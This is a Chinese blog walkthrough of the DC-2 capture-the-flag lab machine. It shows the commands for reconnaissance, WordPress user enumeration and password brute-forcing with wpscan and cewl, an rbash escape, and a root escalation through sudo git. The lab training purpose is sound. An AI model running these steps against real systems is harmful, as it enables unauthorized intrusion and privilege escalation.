DC-2靶机攻略

最新推荐文章于 2024-09-27 11:25:31 发布

Forest深林

最新推荐文章于 2024-09-27 11:25:31 发布

阅读量239

点赞数 1

分类专栏： DC靶机通关指南全家桶文章标签：安全靶机渗透测试

本文链接：https://blog.csdn.net/weixin_47311099/article/details/118803362

版权

DC靶机通关指南全家桶专栏收录该内容

5 篇文章 0 订阅

订阅专栏

DC-2攻略

信息收集

探测目标主机ip地址

使用nmap进行扫描

nmap -sP 192.168.64.0/24 -oN nmapsP.txt

探测目标主机开放端口

使用nmap进行扫描

nmap -A 192.168.64.136 -p 1-65535 -oN nampA.txt 

开放http 80  ； ssh 7744 （改过）

访问80

发现输入网址无法访问

下载时给我们留下提示，要修改hosts文件

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HV3o91ok-1626421924288)(DC-2攻略.assets/image-20210227163706139.png)]

由于url重定向到http://dc-2上，所以需要修改本地hosts文件

windows中hosts文件的路径
C:\Windows\System32\drivers\etc\hosts

linux中hosts文件路径
/etc/hosts
vim /etc/hosts
进去按i
写入192.168.64.136 dc-2
按esc，
:wq

成功进入网站发现flag1

Flag 1:

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

漏洞利用

cewl生成字典

cewl是kali中收录的密码字典生成工具。可以对目标网页进行爬取，搜集网页的关键字生成密码字典。

cewl url
cewl dc-2 > passwd.dir

敏感目录扫描

目录扫描工具很多
dirb
dirbuster
gobuster
......

dirb http://dc-2

==> DIRECTORY: http://dc-2/wp-admin/                                                                                                           
==> DIRECTORY: http://dc-2/wp-content/                                                                                                         
==> DIRECTORY: http://dc-2/wp-includes/

使用wpscan进行扫描

本网站cms是WordPress，wpscan是wordpress的专用扫描器（版本、漏洞、账号等）

wpscan --url dc-2 -e u  扫描用户账号

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
 
 扫出3个用户：admin jerry tom

爆破

写一个用户名字典

wpsacn --url dc-2 -U user.dir -P passwd.dir

得到账密
[!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

尝试登录

http://dc-2/wp-admin/user/admin.php 
在jerry里发现flag2 tom啥也没有

Flag 2:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

login: tom     password：parturient

ssh登录tom

ssh tom@192.168.64.136 -p 7744

tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
tom@DC-2:~$ 

发现有rbash--受限制的bash

rbash绕过

rbash–受限制的bash。为了提高安全性，禁止用户一些可能会对系统造成破环的操作。

BASH_CMDS[a]=/bin/sh;a        
export PATH=$PATH:/bin/    
export PATH=$PATH:/usr/bin   

文章参考https://www.freebuf.com/articles/system/188989.html

tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a    
$ export PATH=$PATH:/bin/ 
$ export PATH=$PATH:/usr/bin 
$ 
$ ls
flag3.txt  usr
$ cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
获得flag3

切换jerry用户

$ su jerry
Password: 
jerry@DC-2:/home/tom$ ls
ls: cannot open directory .: Permission denied
jerry@DC-2:/home/tom$ cd ~
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

在jerry家目录里找到flag4
提示用git方式提权

提权

sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
发现sudo git不需要密码保护

git是用来管理文件的程序
sudo git --help

sudo git -p --help  让缓冲区无法显示全部信息 进而进入交互模式。（放大字体）
!/bin/bash 调用bash

进入root家目录

root@DC-2:/home/jerry# id
uid=0(root) gid=0(root) groups=0(root)
root@DC-2:/home/jerry# cd /root
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt 
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

通关！！！